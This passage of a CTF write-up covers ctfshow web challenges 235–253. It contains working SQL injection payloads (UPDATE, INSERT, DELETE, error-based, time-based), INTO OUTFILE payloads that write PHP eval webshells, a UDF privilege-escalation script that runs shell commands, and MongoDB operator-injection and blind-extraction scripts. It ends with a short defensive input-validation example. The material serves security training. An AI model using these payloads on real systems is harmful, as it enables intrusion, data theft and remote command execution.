| group_concat(`Lxxx`,0x2d,`1`,0x2d,`3`)         |
+------------------------------------------------+
| 2-1-3,admin-1-passwd,user-2-pass,Lxxx-3-123456 |
+------------------------------------------------+
1 row in set (0.00 sec)

Payloads:

username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#&password=1\

username=,username=(select group_concat(`Lxxx`,0x2d,`1`,0x2d,`3`) from (select 1,2 as Lxxx,3 union select * from flag23a1)a)#&password=1\

Web236——UPDATE injection (bypassing information_schema, injection without column names)

It appears to filter flag but does not actually; the payload is the same as in the previous challenge.

username=,username=(select group_concat(`Lxxx`,0x2d,`1`,0x2d,`3`) from (select 1,2 as Lxxx,3 union select * from flaga)a)#&password=1\

Web237——INSERT injection (no filtering)

No filtering; just close the quote and inject.

username=',(select flagass23s3 from ctfshow_web.flag))#&password=1

Web238——INSERT injection (spaces filtered)

username=',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())));#&password=1

username=123',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')));#&password=1

username=',(select(flag)from(flagb)));#&password=1

Web239——INSERT injection (no column names)

username=',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())));#&password=1

username=',(select(flag)from(flagbb)));#&password=123

Web240——INSERT injection (time-based)

This challenge tests time-based injection. The table name is given in the form flagaaaaa (five a/b characters), so enumerate all 32 possibilities with a DFS.

Then run the script:

import time
import requests

url = "http://3788a983-3cf6-43ab-8847-0462b58a9be0.challenge.ctf.show/api/insert.php"
url_flag = "http://3788a983-3cf6-43ab-8847-0462b58a9be0.challenge.ctf.show/api/?page=1&limit=1000"
payload = "Lxxx',(select(flag)from(flag{})));#"
ls = []

def dfs(name, step):
    # enumerate every five-character string over {a, b}: 32 candidates
    if step == 5:
        ls.append(name)
        return
    dfs(name + "a", step + 1)
    dfs(name + "b", step + 1)

dfs("", 0)
for name in ls:
    data = {
        "username": payload.format(name),
        "password": "123"
    }
    res1 = requests.post(url, data=data)
    time.sleep(0.2)
    res2 = requests.get(url_flag)
    # the inserted row shows up in the listing only for the real table name
    if "Lxxx" in res2.text:
        print(res2.text)

Web241——DELETE injection (time-based)

Only time-based blind injection works here. Keep the sleep value short: with sleep(0.1) the page takes noticeably longer than 0.1 s to respond.

import time
import requests

url = "http://58c1b2e2-3b05-4514-9165-3b3121716139.challenge.ctf.show/api/delete.php"
flagstr = "ctfshow1234567890abde{_-}"
payload = "if(ascii(substr((select flag from flag),{},1))={},sleep(0.1),0)"
flag = ""

for i in range(1, 100):
    for j in flagstr:
        data = {
            "id": payload.format(i, ord(j))
        }
        print(data)
        time.sleep(2)
        try:
            res = requests.post(url, data=data, timeout=1)
        except requests.exceptions.Timeout:
            # the request timed out, so sleep() fired: this character matched
            flag += j
            print(flag)
            break

Web242——File injection (writing a one-line webshell)

FIELDS TERMINATED BY 'string': the separator written between fields; one or more characters. The default is "\t".
FIELDS ENCLOSED BY 'char': the character used to quote field values; a single character only. None by default.
FIELDS OPTIONALLY ENCLOSED BY 'char': the character used to quote character-type fields such as CHAR, VARCHAR and TEXT. None by default.
FIELDS ESCAPED BY 'char': the escape character; a single character only. The default is "\".
LINES STARTING BY 'string': the string written at the start of each line; one or more characters. None by default.
LINES TERMINATED BY 'string': the string written at the end of each line; one or more characters. The default is "\n".

1.php' FIELDS TERMINATED BY "<?php eval($_POST[1]);?>";#

Web243——File injection (writing .user.ini to get past the php filter)

This challenge filters the string php, so a one-line shell cannot be written straight into a .php file.

But the file-upload trick works: write a .user.ini that automatically includes an image webshell, which gives a shell.

First, the .user.ini being written has to comment out the line that precedes it; in .user.ini a ; starts a comment.

Payload (0x0a is a newline; the rest decodes to auto_prepend_file=1.png):

.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d312e706e670a;#

Once .user.ini is in place, write the image webshell:

1.png' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b315d293b3f3e;#

Then visit dump/index.php; the password is 1.

Web244——Error-based injection (no filtering)

This part is error-based injection; the payloads are given here, and a detailed summary of error-based injection will follow.

1' or updatexml(1,concat(0x7e,substr((select group_concat(flag) from ctfshow_flag),1,30),0x7e),1)--+

updatexml shows only 32 characters per error and the flag is longer than that, so take it in several slices.

Web245——Error-based injection (updatexml filtered)

updatexml is filtered; extractvalue can be used instead.

1' or extractvalue(1,concat(0x7e,substr((select group_concat(flag1) from ctfshow_flagsa),1,30),0x7e))--+

Web246——Error-based injection (updatexml, extractvalue filtered)

With updatexml and extractvalue filtered, try floor()-based error injection.

1' or 1 group by concat_ws(0x7e,(select flag2 from ctfshow_flags),floor(rand(0)*2)) having min(0) or 1 --+

1' union select 1,count(*),concat(0x7e,(select flag2 from ctfshow_flags),0x7e,floor(rand(0)*2))b from information_schema.tables group by b --+

Web247——Error-based injection (updatexml, extractvalue, floor filtered)

With updatexml, extractvalue and floor filtered, similar functions such as round() and ceil() can replace floor().

A dedicated article on the underlying mechanism will follow.

1' union select 1,count(*),concat(0x7e,(select `flag?` from ctfshow_flagsa),0x7e,round(rand(0)*2))b from information_schema.tables group by b --+

Web248——UDF injection

For this UDF injection the PoC is posted first; a dedicated article will explain it later (another item for the to-do list).

import requests

base_url = "http://f6ec71af-de5f-48a7-af4e-367a4e0ee634.challenge.ctf.show/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
# placeholder: the hex-encoded udf.so the original script carried here is not reproduced on this page
udf = "<HEX_OF_UDF_SO_NOT_REPRODUCED>"
for i in range(0, 21510, 5000):
    end = i + 5000
    payload.append(udf[i:end])

p = dict(zip(text, payload))

for t in text:
    # UDF privilege escalation normally uses dumpfile rather than outfile
    url = base_url + "?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t)
    r = requests.get(url)
    print(r.status_code)

# join the txt pieces back into udf.so
next_url = base_url + "?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'-- +&page=1&limit=10"
rn = requests.get(next_url)

# create the UDF function
uaf_url = base_url + "?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+"
r = requests.get(uaf_url)
# run the command and read the output
nn_url = base_url + "?id=';select sys_eval('cat /flag.*');-- +&page=1&limit=10"
rnn = requests.get(nn_url)
print(rnn.text)

References:

Web249——NoSQL injection (no filtering, array to bypass intval)

This challenge is about NoSQL; an article will follow (another item for the to-do list).

Non-numeric characters are filtered, probably via intval(); passing an array bypasses it.

/api/?id[]=flag

References:

Web250——NoSQL injection (MongoDB tautology)

MongoDB is a NoSQL database; two of its operators:
$ne: not equal (!=)
$regex: regular-expression match

Again, straight to the payload:

username[$ne]=1&password[$ne]=1

References:

Web251——NoSQL injection (regex)

Payload:

username[$regex]=.&password[$regex]=1

Web252——NoSQL injection (regex)

Payloads:

username[$ne]=admin&password[$ne]=1

username[$ne]=admin&password[$ne]=ctfshow666nnneeaaabbbcc

username[$regex]=^[^a].*$&password[$ne]=1

Web253——NoSQL injection (blind)

A NoSQL variant of blind injection; the exploit script:

import requests

url = "http://3c1774d8-cb79-44ad-8ee9-333479ffd820.challenge.ctf.show/api/"
letter = "-ctfshow-0123456789abde{,}"
flag = ""
for i in range(1, 100):
    for j in letter:
        payload = "^{}.*$".format(flag + j)
        data = {
            "username[$regex]": "flag",
            "password[$regex]": payload
        }
        res = requests.post(url, data=data).text
        # "\u767b\u9646\u5931\u8d25" is the JSON-escaped form of "login failed"
        if r"\u767b\u9646\u5931\u8d25" not in res:
            flag += j
            print(flag)
            break

    if j == "}":
        print(flag + "--OUT")
        exit()
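The $ne and $regex payloads in Web250 through Web253 work because PHP turns username[$ne]=1 into an array, and the application passes that array straight into the MongoDB query document, where the key becomes an operator. An added example, not from the writeup: a small parser that nests bracketed keys the way $_GET does, a function that reports operator keys for logging or alerting, and a login-filter builder that accepts only plain strings. The query strings are the page's own payloads; the field names username and password are assumptions.

```python
from urllib.parse import parse_qsl


def parse_php_query(qs):
    """Nest bracketed keys the way PHP's $_GET does, one level deep:
    'username[$ne]=1' -> {'username': {'$ne': '1'}}, 'id[]=flag' -> {'id': {'': 'flag'}}."""
    form = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        if key.endswith("]") and "[" in key:
            base, sub = key[:-1].split("[", 1)
            form.setdefault(base, {})[sub] = value
        else:
            form[key] = value
    return form


def operator_keys(form):
    """Dotted paths of every key that starts with '$': these would reach
    MongoDB as query operators, which is what to log or alert on."""
    found = []
    for field, value in form.items():
        if isinstance(value, dict):
            found.extend("{}.{}".format(field, k) for k in value if k.startswith("$"))
    return found


def build_login_filter(form):
    """Return the MongoDB filter document for a login, or None when either
    credential is not a plain string (arrays and objects are rejected, not coerced)."""
    username = form.get("username")
    password = form.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    return {"username": username, "password": password}


if __name__ == "__main__":
    for qs in ["username=admin&password=s3cret",
               "username[$ne]=1&password[$ne]=1",
               "username[$regex]=^[^a].*$&password[$ne]=1"]:
        form = parse_php_query(qs)
        print(qs, "->", operator_keys(form), build_login_filter(form))
```

A plain-string check at the boundary stops every payload in this section, including the regex-driven extraction loop above, because no operator object can ever reach the query.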

By: Lxxx